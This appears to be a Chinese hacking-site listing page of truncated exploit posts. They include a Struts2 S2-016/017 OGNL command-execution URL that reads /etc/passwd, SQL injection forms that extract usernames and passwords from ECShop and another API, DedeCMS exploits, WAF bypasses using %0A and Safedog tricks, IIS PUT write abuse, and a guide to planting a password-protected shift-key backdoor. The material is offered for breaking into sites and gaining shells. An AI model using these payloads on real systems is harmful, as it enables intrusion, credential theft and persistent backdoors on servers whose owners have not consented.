Struts2 S2-016/S2-017 exp整理
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。 喜欢就点一下感谢吧^_^ 带回显命令执行: https://www.webshell.cc/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passw...
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。 喜欢就点一下感谢吧^_^ 带回显命令执行: https://www.webshell.cc/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passw...
<form method='post' action='https://www.webshell.cc/api.php?act=search_dly_type&api_version=1.0'> columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_oper...
利用条件:web server: apache 漏洞原因::apache 不认识bak 直接当php执行. http://webshell.cc/install/index.php.bak?insLockfile=1 这dedecms死的太冤枉了. apache的原因.
此漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 include/dedesql.class.php: if(isset($GLOBALS['arrs1'])) { $v1 = $v2 = ''; for($i=0;isset...
绕过描述: 在GET请求时,将URL的SQL注入关键字用%0A分隔,%0A是换行符,在mysql中可以正常执行。 测试方法: 请求测试url:https://www.webshell.cc/1.php?id=1%20union%20select%201,2,3,4 — 被拦截 请求测试url:https://www.webshell.cc/1.php?id=-9%0Aun...
这个洞,其实我在2012年1月的时候看ecshop就分析出来过,当初由于感觉鸡肋就没怎么放出来。刚下了个官网最新版的,没想到还存在。 漏洞文件在:/demo/index.php if (!empty($_POST['lang'])) //如果不为空 { $lang_charset = explode('_', $_POST['lang']); //_分割 $updater_lang =...
前段时间去一个流量过百万的站的服务器上参观,朋友加了一个shift后门并称该后门是很久以前他公布的,具体情况我也没多问,回来后自己也做了一个加密码的shift后门.利用winrar加密的.很简单,火力群里一个小弟弟问我怎么做的,叫我写个说明,那么我就简单介绍一下制作过程-Amxking 1.我们首先建立一个名为win.rar的压缩包,及一个批处理命令名为AK.bat的文件. ...
利用办法:先注册.把任意商品加入购物车在填写配送地址那一页,有地区选择,随便选个地区,复制地址到exp下。 EXP: <form name="form1" method="post"> ECSHOP通版本注入漏洞 简单EXP [ Silic Group Hacker Army ]<input name="country" type="text" style="display:no...
很多人也许觉得IIS PUT这玩意不值一提啊...其实不然,身在乙方,给客户做安服的时候总是遇到IIS写权限的问题,一方面WVS7.0已经可以扫描并且使用POC成功写入漏洞目标,另一方面无聊的土耳其或者印度尼西亚黑客总是喜欢利用写权限上传txt或者html到漏洞目标,以示对方的hack技术的强大。 目前大家所见到的IIS写权限利用,其实说白了是菜鸟管理员对IIS的错误配置问题...
撸主就再次用实例来说明吧 本文是撸主对安全狗实战总结,每一个例子都来自于撸主的亲身经历 分为 0X01 注入篇 0X02 上传篇 0X03 提权篇 ,为机油们提供一条龙服务 最后 0x05 现场实例过安全狗 --------------------------------------------- 0X01 注入篇 基本方法:a.添加aaa=123%00& (此方法对老狗有效) b.在被过...